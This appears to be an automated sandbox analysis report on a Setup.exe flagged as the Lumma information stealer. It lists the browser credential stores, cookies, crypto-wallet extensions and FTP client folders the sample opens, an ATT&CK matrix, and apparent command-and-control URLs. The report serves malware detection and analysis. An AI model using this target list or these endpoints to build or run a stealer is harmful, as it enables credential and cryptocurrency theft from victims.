              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1924884334.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 5064, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000003.1948547034.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 5064, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              LSASS Memory121
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information
              Security Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Setup.exe35%VirustotalBrowse
              Setup.exe37%ReversingLabsWin32.Spyware.Lummastealer
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://cheapptaxysu.click/apisp0%Avira URL Cloudsafe
              https://cheapptaxysu.click/Q0%Avira URL Cloudsafe
              https://cheapptaxysu.click/api1pd0%Avira URL Cloudsafe
              https://cheapptaxysu.click/apih0%Avira URL Cloudsafe
              cheapptaxysu.click0%Avira URL Cloudsafe
              https://cheapptaxysu.click/apiMXNc0%Avira URL Cloudsafe
              https://cheapptaxysu.click/y0%Avira URL Cloudsafe
              https://cheapptaxysu.click/apiB0%Avira URL Cloudsafe
